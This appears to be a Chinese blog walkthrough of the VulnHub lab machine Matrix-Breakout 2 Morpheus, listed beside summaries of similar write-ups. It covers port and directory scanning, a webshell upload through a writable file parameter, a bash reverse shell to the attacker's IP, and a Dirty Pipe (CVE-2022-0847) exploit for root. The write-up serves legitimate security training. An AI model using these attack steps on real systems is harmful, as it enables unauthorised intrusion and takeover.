vulnhub靶场Matrix-Breakout 2 Morpheus通关攻略

最新推荐文章于 2025-07-29 20:44:19 发布

原创最新推荐文章于 2025-07-29 20:44:19 发布 · 372 阅读

4 ·

CC 4.0 BY-SA版权

文章标签：

#Matrix-Breakout #vulnhub

1.靶场地址

https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/

2.打开靶场

3.扫描靶机（192.168.159.146为kali的ip）

nmap 192.168.159.146/24

4.探测端口和服务

nmap -p- -sV 192.168.159.157

发现三个端口开启

5.目录扫描

dirsearch -u 192.168.159.157

6.查看网页

没找到什么有用的东西

7.继续目录扫描

用gobuster

gobuster dir -u http://192.168.159.157 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

继续扫描，gobuster字典更大

8.访问网站

9.抓包分析

发现会将内容写入txt中

10.访问graffiti.txt

11.修改文件名

抓包产生是否能修改file参数

12.上传木马

可以访问到

13.链接蚁剑

14.上传文件

上传shell.sh

bash -i >& /dev/tcp/192.168.159.146/6666 0>&1

15.kali监听

在kali监听6666端口

nc -lvnp 6666

运行命令

bash /tmp/shell.sh

16.查看内核版本

uname -a

发现漏洞

17.下载上传

https://github.com/r1is/CVE-2022-0847

下载运行即可

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

与神明画鸭

关注关注

6
点赞
踩
4

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

vulnhub靶场之breakout

China_I_LOVE的博客

11-25

1197

养成经常看页面源代码的习惯涉及到简单的密码破解，可以增长记忆，这里是brainenum4linux的使用，可以清晰的看到SMB的好多内容结合收集到的所有信息进行尝试，这里只给出网站，并且可登录，就根据自己的信息去尝试对于登录到网站系统中的时候，对于网站的功能，都点击进行测试，比如有修改密码等操作时，就可以抓包分析妥善使用compgen -c来获取当前用户的可用命令，配合grep进行筛选记得一些敏感文件的常用关键字，如密码，可能文件名中就有pass命令getcap的使用，附在最后吧反弹。

VulnHub-matrix-breakout-2-morpheus通关攻略

m0_66808441的博客

03-19

989

【代码】VulnHub-matrix-breakout-2-morpheus通关攻略。

参与评论您还未登录，请先登录后发表或查看评论

Vulnhub靶场之matrix-breakout-2-morpheus

qq_69775412的博客

10-17

1019

简介： vulnhub是一个提供靶场环境的平台。今天从首页下载了一个来做，它叫matrix-breakout-2-morpheus。

靶场-Matrix-v3

weixin_58602402的博客

06-14

226

5.将生成的公钥权限进行提升，并利用trinity用户的cp命令将公钥放在trinity用户的家目录下。7.查看trinity用户使用的sudo命令，发现用户可以无密码以root身份执行oracle下的命令。直接将/usr/bin/bash复制到trinity家目录下并改名为oracle，赋予执行权限。利用guest用户生成一个ssh密钥,位置为/home/guest/.ssh/id_rsa。2.查看当前用户使用的sudo命令,发现trinity用户无密码使用/bin/cp命令。

Matrix3靶场

zjxxxy的博客

06-14

169

vulnhub靶场Matrix3攻略

Vulnhub项目：Breakout

Ays.Ie的博客

04-15

489

本篇记录了vulhub靶机：breakout的整个渗透过程，希望能够帮助到有需要的人

vulhub靶场-matrix-breakout-2-morpheus

mashiro_hibiki的博客

03-11

482

根据提示，在 cypher-neo.png 中存在flag，但是下载图片后并没有发现什么有用的信息，查看图片的时候需要把图片前面的.去掉才能在文件夹中看到图片。这里的话需要注意，提权的话，我们需要有一个bash终端才能在提权后成功获取到root权限的bash，所以我们先用php来获取一个bash。发现开放的端口服务，可以通过爆破ssh弱口令的形式来直接获取服务器权限，但一般ssh的口令都不太好爆破，访问开放的http服务。下载完成后，在vmware中打开，选择刚刚下载的ova文件。

Vulnhub：BREAKOUT靶机

qq_63283137的博客

10-10

652

smb服务是一个协议名，它能被用于Web连接和客户端与服务器之间的信息沟通，通过 SMB 协议，客户端应用程序可以在各种网络环境下读、写服务器上的文件，以及对服务器程序提出服务请求。可以配置操作系统内部，如用户，磁盘配额，服务或配置文件，以及修改和控制开源应用程序。每当看到二进制文件的副本时，都应该检查一下其 Capabilities(功能)和 suid 程序。根据爆破出来的用户，与解密出的密码尝试登录webmin。再分析扫描出的信息，发现端口服务是smb。发现密码备份文件，但是没有任何的权限。

vulnhub靶场Matrix-Breakout 2 Morpheus教程

xnxqwzy的博客

02-25

1867

靶场搭建直接解压双击ova文件即可使用软件：VMware（可能会出现问题），（此处官方建议使用VirtualBox）难度：中等攻击机：kali* 信息收集为了方便我直接使用windows上的lansee直接扫描出目标靶机ip!lansee扫描结果去除已知靶机ip剩下的就是目标靶机当然需要访问看看!访问结果看看源码能出现啥!192.168.21.134网页主页源码没有什么有用的看看nmap能看出来啥!nmap简单扫描结果看看端口详细信息!nmap扫描到的详细信息。

vulnhub靶场之EMPIRE:BREAKOUT

qq_58091216的博客

01-29

1314

在Linux中，能力是一种粒度更细的权限系统，用于授予进程执行特定操作的权限，而不是传统的用户和组权限模型。我们已经有了用户的密码，所以我们要着手寻找用户名了,由于靶机开放了smb服务，所以我们可以收集有关靶机smb的信息, 使用命令enum4linux可以收集大量的信息。用户和组枚举： Enum4linux 可以列出目标系统上的用户和组，包括一些敏感信息，如用户ID（UID）、组ID（GID）、用户描述等。10000端口和20000端口是不同的登录系统，一个是登录网站的，一个是登录用户的。

vulnhub breakout

qq_62144749的博客

08-15

1428

打靶分享：VulnHub-Breakout

weixin_66249173的博客

02-02

1808

最终在/var/backups目录下发现了一个.old_pass.bak看着像个密码，但是没有查看权限，此时我就想到了可以用tar进行压缩再解压，最终得到了一个密码，猜测是root密码。在 Linux 中，文件能力允许进程执行一些超出普通权限的操作，而无需完全的超级用户权限。SMB 协议通常用于在局域网中实现文件和打印机共享，而 Samba 则是 Linux 和其他类 Unix 系统上的一个实现，发现就是个普通的界面，查看源码（这里要仔细查看，并且翻到底。切换时发现会出现失败的情况，所以反弹shell。

VulnHub BREAKOUT

人若无名，便可专心练剑

10-07

175

然后使用这个用户名和之前得到的密码尝试登录Webmin，发现可以登进20000端口的Webmin服务。后来发现在/var/backups/目录下有一个.old_pass.bak文件，但没有读取权限。，因此它可以读取任意文件（利用该tar 打包再解压就可以查看没有权限查看的文件内容）得到密码，使用su 获得root shell，拿到flag。通过ls -la 发现有tar和user.txt。也是个登录界面，和10000端口的不一样。user.txt里面是user的flag。发现有一个cmd 执行命令的。

Vulnhub 02-Breakout靶机渗透攻略详解

最新发布

2201_75617121的博客

07-29

558

摘要：本文记录了从下载Empire靶机到最终获取root权限的完整渗透测试过程。主要包括：1）配置靶机网络环境并扫描发现目标IP；2）通过nmap扫描发现开放端口（80/139/445/10000/20000）；3）使用gobuster进行目录扫描，在网页源码中发现Brainfuck编码的密码；4）通过enum4linux找到cyber账户，利用20000端口成功登录；5）在/var/backups目录发现备份密码实现提权。最终通过获取的密码以root身份登录系统，完成渗透测试。

VulnHub靶机渗透实战7-BREAKOUT

随心所欲不逾矩

11-18

443

靶机超级简单。靶机和Kali桥接。

MATRIX-BREAKOUT: 2靶场

l2772513700的博客

03-19

310

试试抓包，我们可以看到参数时file，推测是把输入的东西发送到file后面的参数，可以更改file试试。访问shell.php，用网址链接蚁剑，用虚拟终端反弹shell。用kali查看自己的ip，扫描自己所在的网段，发现靶机的ip。下载靶机，把它设置成net模式，和kali在同一网段。试试写入一句话木马,因为不是php文件，没有用。写入一句话木马，把file的参数改成php文件。没找到有用的目录，可以换一个工具试试。在php上的留言会在txt上显示。

matrix-breakout-2-morpheus已完成

qaqCL的博客

07-28

370

matrix-breakout-2-morpheus

vulnhub靶场之Matrix-Breakout 2 Morpheus

qq_58091216的博客

01-31

1950

我们找到了Flag 1!,提示我们从80端口的Web服务器中提取此图像以获得另外一个flag，图像的名称叫/.cypher-neo.png,可以看到是一个隐藏文件。蚁剑的文件不是完整的，可能会有隐藏文件，此处简单一点直接在反弹shell双管齐下（一句话魔改一下）（记得要弄url编码）（干掉问号和空格和&）此处有一个file变量，那么改变file变量可以直接对靶机文件修改，能随意创建文件,二话不说写个马，准备反弹shell。截止到目前，我们没有找到任何有用的信息，我们可以换一个思路进行。

对Matrix-Breakout-2-Morpheus靶机进行渗透测试

12-13

对Matrix-Breakout-2-Morpheus靶机进行渗透测试是一项复杂且具有挑战性的任务。渗透测试的目的是通过模拟黑客的攻击手段，评估系统的安全性并发现潜在的安全漏洞。以下是进行渗透测试的一般步骤和方法： ### 1. ...